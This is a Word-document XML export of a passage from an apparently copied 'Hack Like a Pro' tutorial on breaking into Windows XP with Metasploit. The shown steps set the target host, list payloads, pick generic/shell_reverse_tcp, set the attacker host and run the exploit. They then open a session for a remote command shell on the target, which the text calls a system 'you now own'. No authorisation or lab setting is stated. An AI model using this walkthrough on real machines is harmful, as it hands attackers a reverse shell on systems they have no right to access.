    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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noProof/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5638800" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="https://img.wonderhowto.com/img/43/44/63470437967745/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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43/44/63470437967745/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Set Remote Host</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will now ask us for the RHOST. This will be the IP address of the remote host or the machine we're attacking. In our case, it's 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help in identifying the IP address of the machine you are attacking. Notice in the picture above that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tells us that we will be using (binding) port 135.</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; set RHOST 10.0.0.3</w:t>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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Show Payloads</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Next, we check to see what payloads are available for this exploit. Type show payloads at the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prompt:</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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noProof/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5638800" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="https://img.wonderhowto.com/img/57/29/63470438046603/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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57/29/63470438046603/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Set Payload</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Now that we can see what payloads are available, we can select the generic/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using the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console </w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> command. If successful, this will establish a remote shell on the target system that we can command.</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; set PAYLOAD generic/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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noProof/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5638800" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="https://img.wonderhowto.com/img/44/02/63470438084948/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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44/02/63470438084948/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Set Local Host</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Now that we've chosen the exploit and the payload, we need to tell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the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, can help you obtain IP addresses.</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; set LHOST 10.0.0.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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noProof/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5638800" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="https://img.wonderhowto.com/img/32/25/63470438131795/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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32/25/63470438131795/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>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Now we command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to exploit the system:</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264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="0" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Helvetica"/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="383838"/>
        </w:rPr>
        <w:t>Step 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Open a Shell on the Hacked System</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Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>sessions –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> to open a command shell on the XP system that will appear on your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 xml:space="preserve"> console.</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</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To confirm that the command shell is on the Windows XP system, type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> to get a directory listing on the Windows XP system that you now own!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>C: &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="360"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Congratulations! You have just hacked your first system using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">In my upcoming lessons, we will look at hacking Linux systems and introduce you to the powerful </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Metasploit's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> proprietary payload.</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4E76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="771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F3AE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53A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5F1EE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="600C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EB1346"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="340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014D99"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66B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170B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA66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2E40ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E71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EF"/>
    <w:rsid w:val="00264BEF"/>
    <w:rsid w:val="00582D88"/>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EE683-A864-4742-AFD1-DDCA01A4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64BEF"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00264BEF"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00264B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264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1247">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="911694465">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="450"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="23" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="23" w:color="auto"/>
            <w:bottom w:val="single" w:sz="24" w:space="23" w:color="7ABD13"/>
            <w:right w:val="none" w:sz="0" w:space="23" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="405808228">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="679432969">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="284386979">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
